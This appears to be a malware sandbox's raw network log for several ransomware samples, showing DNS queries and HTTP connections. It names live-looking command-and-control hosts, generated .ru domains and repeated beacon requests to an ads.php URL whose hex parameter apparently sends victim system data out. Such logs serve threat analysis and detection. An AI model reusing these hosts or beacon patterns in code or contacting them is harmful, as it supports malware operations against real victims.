Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

r.driftinhishouse.com

rundll32.exe

Remote address:

8.8.8.8:53

Request

r.driftinhishouse.com

IN A

Response
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

learn.microsoft.com

IEXPLORE.EXE

Remote address:

8.8.8.8:53

Request

learn.microsoft.com

IN A

Response

learn.microsoft.com

IN CNAME

learn-public.trafficmanager.net

learn-public.trafficmanager.net

IN CNAME

learn.microsoft.com.edgekey.net

learn.microsoft.com.edgekey.net

IN CNAME

learn.microsoft.com.edgekey.net.globalredir.akadns.net

learn.microsoft.com.edgekey.net.globalredir.akadns.net

IN CNAME

e13636.dscb.akamaiedge.net

e13636.dscb.akamaiedge.net

IN A

23.192.22.89
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

107.178.223.183:53

Request

ransomware.bit

IN AAAA
DNS

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

Remote address:

8.8.8.8:53

Request

hicham9risa.duckdns.org

IN A

Response

hicham9risa.duckdns.org

IN A

192.169.69.25
DNS

183.223.178.107.in-addr.arpa

Remote address:

107.178.223.183:53

Request

183.223.178.107.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

107.178.223.183:53

Request

carder.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

checkip.dyndns.org

Remote address:

8.8.8.8:53

Request

checkip.dyndns.org

IN A

Response

checkip.dyndns.org

IN CNAME

checkip.dyndns.com

checkip.dyndns.com

IN A

132.226.247.73

checkip.dyndns.com

IN A

193.122.130.0

checkip.dyndns.com

IN A

132.226.8.169

checkip.dyndns.com

IN A

158.101.44.242

checkip.dyndns.com

IN A

193.122.6.168
GET

http://checkip.dyndns.org/

Remote address:

132.226.247.73:80

Request

GET / HTTP/1.1
Host: checkip.dyndns.org
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 09 Nov 2024 19:45:11 GMT
Content-Type: text/html
Content-Length: 105
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 20f35dccab60b1702993a93039b00f8c
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN A
DNS

ransomware.bit

Remote address:

104.155.138.21:53

Request

ransomware.bit

IN AAAA
DNS

21.138.155.104.in-addr.arpa

Remote address:

104.155.138.21:53

Request

21.138.155.104.in-addr.arpa

IN PTR
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN A
DNS

carder.bit

Remote address:

104.155.138.21:53

Request

carder.bit

IN AAAA
DNS

rosugoshurgurhus.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

rosugoshurgurhus.ru

IN A

Response
DNS

gsisirfjjdissofj.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

gsisirfjjdissofj.ru

IN A

Response
DNS

rgouusrsuoonenue.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

rgouusrsuoonenue.ru

IN A

Response
DNS

euignjsosjfhgidi.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

euignjsosjfhgidi.ru

IN A

Response
DNS

oegoafaueoueuueu.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

oegoafaueoueuueu.ru

IN A

Response
DNS

eueininiavaeiiae.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

eueininiavaeiiae.ru

IN A

Response
DNS

nfaiiaeiinbbivii.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

nfaiiaeiinbbivii.ru

IN A

Response
DNS

pppsooodlldliifi.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

pppsooodlldliifi.ru

IN A

Response
DNS

aigiaeuiuueueuer.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

aigiaeuiuueueuer.ru

IN A

Response
DNS

cnnaiisdiififiur.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

cnnaiisdiififiur.ru

IN A

Response
DNS

eeiieieiifigigid.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

eeiieieiifigigid.ru

IN A

Response
DNS

ruuiooototoroidj.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

ruuiooototoroidj.ru

IN A

Response
DNS

ddissisifigifidi.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

ddissisifigifidi.ru

IN A

Response
DNS

cicicicciicciiis.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

cicicicciicciiis.ru

IN A

Response
DNS

ssorgurufsogusru.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

ssorgurufsogusru.ru

IN A

Response
DNS

eoppgjrsokoedosh.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

eoppgjrsokoedosh.ru

IN A

Response
DNS

geoaueoafugaeije.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

geoaueoafugaeije.ru

IN A

Response
DNS

nnvmmsiisirurutt.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

nnvmmsiisirurutt.ru

IN A

Response
DNS

auueieieiiighisf.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

auueieieiiighisf.ru

IN A

Response
DNS

eoooeghgosofofjs.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

eoooeghgosofofjs.ru

IN A

Response
DNS

eogoehoshefheguh.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

eogoehoshefheguh.ru

IN A

Response
DNS

sgsourfsuofgsgur.ru

winsvcs.exe

Remote address:

8.8.8.8:53

Request

sgsourfsuofgsgur.ru

IN A

Response

185.84.108.232:80

http://brb.3dtuts.by/ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603a2e3f32343f3c753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a3528343675160812177519373438303e29753c3e35763f3d6f6d3f6c3a6a683d396d6838693a6c6e6c6e3a6d6e6b3963683a6b626b3d696f3a3e6a39636c6d6d393e6b6b6f3a6f386b3f3a683e69383d62693a3a3d62753e233e60131e0e09760f2934313a3576093a3528343675160812177518292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e60131e0e09760f2934313a3576093a352834367516081217751c3a353f1829222b2f753c3e3576626d696e6f6b6a6c38686b693f3d3a62396f6338383e3a6a623d6e3a6b63623f383f63636b6c3863383a63396e626e6338686c683a6b6f39633a6b6c3e6a383e753e233e60131e0e09760f2934313a3576093a35283436750c323568697519373438303e29753c3e3576696e626d62696d626f6f6a6e6f3d6b6a6f6c6c3d396e6a3d696a3f6f633e3e38686c3d3a63626c6d396a68623a62383a63696268393d386e696c623d3e386f62753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3e353e2932387669623f6c6c383d6a633f3a3a3e633e6d686b6f386d6a3d6238693f3d3f6969393a6a696f6e6c6d3962623e6a626b3a3a68626e6e6969696e3d3a393d6f626d3a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b30397638636b3f3d6b696f3a636c636c693e6e683a6a3f3d6e6b6b6d6a6b6c623e693e626c686d6c68386d633d38636a3f393f3d3f6c623f6263623f3f63696a69396e753e233e600f2934313a3576093a35283436750c3235686975083a3c3e1829222b2f753f2a2a766b3f6f3a3f3e6e3e39696868636d393a38686d6e6b3e3e3f6d3f6c3e6338686a6a3f62383d38686262396e6b6d6c6f3e636f63623a6e6869633838386e633e3a753e233e

http

Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

3.6kB
2.1kB
9
7

HTTP Request

GET http://brb.3dtuts.by/ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e603a2e3f32343f3c753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a3528343675160812177519373438303e29753c3e35763f3d6f6d3f6c3a6a683d396d6838693a6c6e6c6e3a6d6e6b3963683a6b626b3d696f3a3e6a39636c6d6d393e6b6b6f3a6f386b3f3a683e69383d62693a3a3d62753e233e60131e0e09760f2934313a3576093a3528343675160812177518292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e60131e0e09760f2934313a3576093a352834367516081217751c3a353f1829222b2f753c3e3576626d696e6f6b6a6c38686b693f3d3a62396f6338383e3a6a623d6e3a6b63623f383f63636b6c3863383a63396e626e6338686c683a6b6f39633a6b6c3e6a383e753e233e60131e0e09760f2934313a3576093a35283436750c323568697519373438303e29753c3e3576696e626d62696d626f6f6a6e6f3d6b6a6f6c6c3d396e6a3d696a3f6f633e3e38686c3d3a63626c6d396a68623a62383a63696268393d386e696c623d3e386f62753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3e353e2932387669623f6c6c383d6a633f3a3a3e633e6d686b6f386d6a3d6238693f3d3f6969393a6a696f6e6c6d3962623e6a626b3a3a68626e6e6969696e3d3a393d6f626d3a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b30397638636b3f3d6b696f3a636c636c693e6e683a6a3f3d6e6b6b6d6a6b6c623e693e626c686d6c68386d633d38636a3f393f3d3f6c623f6263623f3f63696a69396e753e233e600f2934313a3576093a35283436750c3235686975083a3c3e1829222b2f753f2a2a766b3f6f3a3f3e6e3e39696868636d393a38686d6e6b3e3e3f6d3f6c3e6338686a6a3f62383d38686262396e6b6d6c6f3e636f63623a6e6869633838386e633e3a753e233e

HTTP Response

403
194.109.206.212:443

Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe

152 B
3
127.0.0.1:49257

Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe
127.0.0.1:49293

Trojan-Ransom.Win32.Shade.pkb-c80df024a87872e53a1df50061079e2e973673c68fc81dbdfd79d989dd8212b5.exe
92.63.197.48:80

winsvcs.exe

152 B
3
193.23.244.244:443

www.ehmw773nycuu7z.com

tls

Trojan-Ransom.Win32.Shade.pjy-dc46178df311e85dbac68168f206272d2a49d3823a322fa023dd15691a9c1553.exe

3.3kB
6.2kB
13
10
92.63.197.48:80

winsvcs.exe

152 B
3
185.84.108.232:80

http://brb.3dtuts.by/ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a3528343675160812177519373438303e29753c3e35763f3d6f6d3f6c3a6a683d396d6838693a6c6e6c6e3a6d6e6b3963683a6b626b3d696f3a3e6a39636c6d6d393e6b6b6f3a6f386b3f3a683e69383d62693a3a3d62753e233e60131e0e09760f2934313a3576093a352834367516081217751c3a353f1829222b2f753c3e3576626d696e6f6b6a6c38686b693f3d3a62396f6338383e3a6a623d6e3a6b63623f383f63636b6c3863383a63396e626e6338686c683a6b6f39633a6b6c3e6a383e753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e600f2934313a3576093a35283436750c3235686975083a3c3e1829222b2f753f2a2a766b3f6f3a3f3e6e3e39696868636d393a38686d6e6b3e3e3f6d3f6c3e6338686a6a3f62383d38686262396e6b6d6c6f3e636f63623a6e6869633838386e633e3a753e233e602c3235282d3828753e233e600c36320b292d081e753e233e60292e353f37376869753e233e60333e2e29762f2934313a3576293a3528343675362832377538292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e60131e0e09760f2934313a3576093a3528343675160812177518292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e603528373434302e2b753e233e603834353334282f753e233e

http

Trojan-Ransom.Win32.Blocker.ldrx-6b3c7fc050b45545b98269c1c0d87eab38380510a7238ee1e914ff963d6e06f1.exe

3.3kB
2.1kB
9
7

HTTP Request

GET http://brb.3dtuts.by/ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a3528343675160812177519373438303e29753c3e35763f3d6f6d3f6c3a6a683d396d6838693a6c6e6c6e3a6d6e6b3963683a6b626b3d696f3a3e6a39636c6d6d393e6b6b6f3a6f386b3f3a683e69383d62693a3a3d62753e233e60131e0e09760f2934313a3576093a352834367516081217751c3a353f1829222b2f753c3e3576626d696e6f6b6a6c38686b693f3d3a62396f6338383e3a6a623d6e3a6b63623f383f63636b6c3863383a63396e626e6338686c683a6b6f39633a6b6c3e6a383e753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e600f2934313a3576093a35283436750c3235686975083a3c3e1829222b2f753f2a2a766b3f6f3a3f3e6e3e39696868636d393a38686d6e6b3e3e3f6d3f6c3e6338686a6a3f62383d38686262396e6b6d6c6f3e636f63623a6e6869633838386e633e3a753e233e602c3235282d3828753e233e600c36320b292d081e753e233e60292e353f37376869753e233e60333e2e29762f2934313a3576293a3528343675362832377538292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e60131e0e09760f2934313a3576093a3528343675160812177518292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e603528373434302e2b753e233e603834353334282f753e233e

HTTP Response

403
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
92.63.197.60:80

winsvcs.exe

152 B
3
192.169.69.25:9191

hicham9risa.duckdns.org

heur-trojan-ransom.msil.crusis.gen-71291d338968aa429dcfddf5b313ffd18e0e8144f50d95f9fcc66750fde15dda.exe

148 B
88 B
3
2
185.84.108.232:80

http://brb.3dtuts.by/ads.php?i=10.127.1.95&c=ZQABOPWE&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c32353235322f753e233e603828292828753e233e602c323537343c3435753e233e60283e292d32383e28753e233e6037283a2828753e233e60372836753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282b343437282d753e233e60282d383334282f753e233e602f3a28303334282f753e233e603f2c36753e233e603e232b3734293e29753e233e603f37373334282f753e233e6014080b0b080d18751e031e600c36320b292d081e753e233e60282d383334282f753e233e60282b2b282d38753e233e602f3a2830363c29753e233e6038363f753e233e603834353334282f753e233e60131e0e09760f2934313a3576093a35283436750c32356869751829222b36343f753c3e35766d6962626e3e693a6e386f68636f6b6e6f393e6e3f3d6d386f6e6e623a623f3f386f6b6c39683f6b696a6a6b6b6862696a683e6c6b696b636e68696b3869693a753e233e60131e0e09760f2934313a3576093a35283436750c32356869751c3a353f1829222b2f753c3e357668383f3f636e6c3e626b3e683f696a6b3862626a6968693f6f38623f3e626868623a6c3d693d3a626f6a3a3a386c386c3f696c3f3868696a396f3e626d63383a753e233e600f2934313a3576093a35283436750c323568697519373438303e2975373f2923766d3968386c3d386b6e6b396f6e6e6f6e396263696d62386a386b3f636c3e3a39686368636b6e6a6b3a6c6968633e3e6a3e626a6f3d3d626d683f6d3e6b6d3d6a753e233e600f2934313a3576093a35283436750c323568697508333a3f3e752b3122763f386f6d6a6c633f3d686a6a3e636e3f393a386d636a6d633d696b6d696c693f693a6f623f686369683a6869693d3a6b69683f3f6a6e6d626a3a62386a6e6e68753e233e602c3235282d3828753e233e600c36320b292d081e753e233e60292e353f37376869753e233e60333e2e29762f2934313a3576293a3528343675362832377538292e283228753c3e35766c6a69626a3f686863626d633a3a6f69623f383d3f3f3d6e39686a683d3d3f6a633e6b3e636a6f6f3d6e6b3f626e3d623d38386d6d6c6e6b3d3f3e6a6e3f3f3a753e233e6038363f753e233e603834353334282f753e233e60282d3838753e233e600c36320b292d081e753e233e600c36321a2b08292d753e233e600c36320b292d081e753e233e6038363f753e233e603834353334282f753e233e602c323532352f753e233e603528373434302e2b753e233e603834353334282f753e233e

http

